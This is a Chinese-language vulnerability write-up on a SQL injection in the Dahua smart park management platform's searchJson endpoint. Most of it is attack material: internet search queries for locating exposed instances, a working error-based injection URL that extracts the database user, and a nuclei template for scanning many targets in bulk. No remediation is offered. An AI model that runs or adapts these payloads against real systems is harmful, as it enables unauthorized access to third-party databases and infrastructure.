大华智慧园区综合管理平台searchJson SQL注⼊漏洞

漏洞简介

大华智慧园区综合管理平台是一款综合管理平台，具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配，满足多元化的管理需求，同时通过提供智能服务，增强使用体验。由于该平台未对用户输入数据做限制，攻击者可以直接将恶意代码拼接进SQL查询语句中，导致系统出现SQL注入漏洞。

漏洞复现

fofa语句："/WPMS/asset/lib/gridster/"或app="dahua-智慧园区综合管理平台"
鹰图语句：web.body="/WPMS/asset/lib/gridster/"
网站登录页面如下：

POC：

/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20user()),0x7e),1)--%22%7D/extend/%7B%7D

nuclei批量yaml文件

id: Dahua_searchJson_sqli
info:
  name: 大华智慧园区综合管理平台searchJson SQL注入漏洞
  author: mhb17
  severity: critical
  description: description
  reference:
    - https://peiqi.wgpsec.org/wiki/iot/%E5%A4%A7%E5%8D%8E/%E5%A4%A7%E5%8D%8E%20%E6%99%BA%E6%85%A7%E5%9B%AD%E5%8C%BA%E7%BB%BC%E5%90%88%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20getFaceCapture%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
  tags: sqli
requests:
  - raw:
      - |+
        GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20user()),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - XPATH syntax error
      - type: word
        part: header
        words:
          - '500'